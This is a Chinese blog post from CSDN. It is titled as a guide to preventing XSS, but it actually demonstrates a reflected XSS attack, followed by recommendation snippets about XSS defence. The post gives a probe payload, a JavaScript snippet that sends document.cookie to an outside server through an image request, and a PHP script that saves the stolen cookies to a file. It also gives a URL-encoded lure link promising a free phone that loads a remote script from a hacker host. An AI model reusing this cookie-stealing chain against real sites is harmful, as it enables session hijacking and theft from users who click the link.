实例演示如何防止xss攻击

最新推荐文章于 2024-07-23 00:06:29 发布
最新推荐文章于 2024-07-23 00:06:29 发布
阅读量371 收藏
点赞数
分类专栏: 技术文章
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwww6662003/article/details/25912779
版权

原文链接:实例演示如何防止xss攻击

xss攻击大致分为三种类型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最广的一种攻击方式。它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。

通过一个反射型xss的实战演示,让大家详细了解这种攻击方式。

一、查找网站漏洞

由于xss漏洞一般发生于与用户交互的地方,因此搜索框是我们关注的重点。

1、打开www.*.com网站,找到搜索框所在的地方,输入”编程”,那么这样的话会出现含有”编程”的字样的搜索结果。

2、在搜索框中输入”<script>alert(1)</script>”测试一下,如果出来下面这个弹窗,说明网站存在xss漏洞,会执行请求http://www.*.com/search.php?q=编程。

二、添加自已的代码

总共需要两个文件,一个是发送请求的xss.js,一个是接受数据的xss.php。

javascript文件xss.js的代码内容如下:

var img = new Image();
img.src = "http://www.*.com/xss.php?q="+document.cookie;
document.body.append(img);

php文件xss.php的代码内容如下:

<?php
$cookie = $_GET['q'];
var_dump($cookie);
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie);
?>

现在我们可以组合一个地址,如下:

现在可以构造一个url地址来让用户点击:

<a href=”http://www.*.com//search.php?q=%3Cscript+src%3Dhttp%3A%2F%2Fhacker.qq.com%2Fhacker.js%3E%3C%2Fscript%3E”>点击就送手机</a>

三、得到的信息

经过上面地址的请求后,可以查看下我们所获取的内容。内容如下:

介绍完毕。

天堂
关注
专栏目录
前端安全系列:如何防止XSS攻击
02-25
随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入CSP、Same-SiteCookies等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前端技术人员不断进行“查漏补缺”。近几年,美团业务高速发展,前端随之面临很多安全挑战,因此积累了大量的实践经验。我们梳理了常见的前端安全问题以及对应的解决方案,将会做成一个系列,希望可以帮助前端人员在日常开发中不断预和修复安
前端安全之XSS的原理和
我可是小老虎的博客
10-11 904
前端安全 XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 XSS 漏洞的发生和修复 XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。 一个案例 某天,公司需要一个搜索页面,根据 URL 参数决定关键词的内容。小明很快把页面写好并且上线。代码如下: <input type="text" value="<%= getParameter("keyword") %&gt.
跨站脚本攻击(XSS)以及如何防止它?
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
07-23 804
XSS攻击是指攻击者通过注入恶意脚本到网页,当其他用户浏览该页面时,恶意脚本会在受害者的浏览器中执行,从而获取敏感信息、篡改页面内容或执行其他恶意操作。XSS攻击是前端开发中不可忽视的一部分。通过理解XSS攻击的原理及其御策略,我们可以构建出更加安全、健壮的Web应用。随着网络环境的不断演变,开发者应持续关注最新的安全动态,不断优化和升级自己的安全实践,以保护用户的信息安全。在日常开发中,我们应该秉持谨慎的态度,对每一行代码负责,共同营造一个更加安全的互联网世界。
如何防止XSS攻击
m0_49521873的博客
05-23 6649
3. 设置HTTP头部:设置HTTP头部,包括Content-Security-Policy、X-Content-Type-Options、X-XSS-Protection等,来使浏览器拦截来自第三方资源的恶意脚本。4. 使用脚本过滤器:使用脚本过滤器,如Google的Closure Library和jQuery库等,能够对来自用户的数据进行过滤和检查。2. 转义特殊字符:在网页中用户输入的内容需要使用转义字符,例如将 < 转义成 <,将 > 转义成 >,避免浏览器将这些字符误解为标签等。
如何防止XSS攻击
半夏_2021的博客
05-05 6430
如何防止XSS攻击
xss攻击实例
frinck的博客
10-16 5064
Cross Site Script 攻击者利用应用程序的动态展示数据功能,在 html 页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在 html 中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的。 1.分类 ????反射型跨站脚本攻击 攻击者会通过社会工程学手段,发送一个 URL 连接给用户打开,在用户打开页面的同时,浏览器会执行页面中嵌入的恶意脚本。 ✨存储型跨站脚本攻...
浅谈如何xss攻击
xj28555的博客
07-23 532
笔前闲聊 最近都在写一些守型文章,是因为笔者在最近的学习当中发现一些当初以攻击者角度学习的知识在某些特殊的场合下会表现的有点不够全面,总是感觉某些知识点联系不在一起,所以最近总是写一些御型文章来把一些知识加强理解,在脑子里形成自己的知识脑图。 认识xss 首先还是来了解什么是xss,师傅们对这个东西估计也挺熟的啦,我就直接上百度了。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页...
web安全之XSS攻击御pdf
08-25
为了更直观地理解XSS攻击的过程,我们可以通过一个简单的示例来演示XSS的基本原理: - 创建一个HTML文件`index.html`,其中包含一个表单,用户可以在表单中输入自己的名字,并提交给服务器端的`xss.php`文件。 - `...
web安全之XSS攻击demo
04-18
我们可以看到index.html文件可能包含了一个易受XSS攻击的页面结构,jquery.min.js可能是用来处理页面交互的JavaScript库,而demo文件可能是一个用于演示如何实施或防止XSS攻击实例XSS攻击的关键在于正确地...
php处理xss攻击过滤.rar
01-18
这意味着它不仅提供了实际的代码实现,还可能有演示如何使用这些方法的实例,这对于开发者理解和应用这些护措施非常有帮助。 标签“PHP xss”进一步确认了这个资源与PHP语言和XSS御策略有关。在PHP中处理XSS...
XSS的攻击及御代码的简单演示
04-25
这个是XSS的攻击及御代码的简单演示,利用Node搭建的
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
防止XSS攻击解决办法
01-20
防止XSS攻击简单实用的解决办法,直接复制两个过滤器,然后配置web.xml即可实现
php_XSS攻击插件
05-29
"php_XSS攻击插件"便是这样一种工具,它专为PHP环境设计,旨在确保从HTML编辑器或文本域获取的JS传值不包含潜在的XSS攻击代码。 **HTMLPurifier库的介绍** 在提供的压缩包中,我们看到一个名为`htmlpurifier`的...
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
热门推荐
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何XSS。希望您喜欢~
前端安全系列(一):如何防止XSS攻击
qkh1234567的博客
05-14 2245
Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求。
什么是 XSS 攻击,如何避免?
蜗牛Clear的博客
04-29 154
XSS攻击,全称跨站脚本攻击(Cross Site Scripting),是指攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。总的来说,XSS攻击需要综合考虑多个方面,从输入验证、输出编码、Cookie设置、范点击劫持到引入验证码机制等,以建立一个多层次的护体系,确保网站和用户的安全。
如何防止xss攻击
xiaozhuangyumaotao的博客
05-26 453
所谓xss,全称Cross Site Scripting,翻译过来就是"跨站脚本攻击",按照惯例,我们该称之为CSS,但是css不是有了么,为了不和层叠样式表(英文名Cascading Style Sheets, CSS)的缩写混淆,才将跨站脚本攻击缩写为XSSXSS是一种在web应用中的程序安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 至今为止,你可能依然不知道xss攻击到底是啥。举个简单例子: 论坛都玩过吧,如果你在发表帖子的时候输入"&l...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值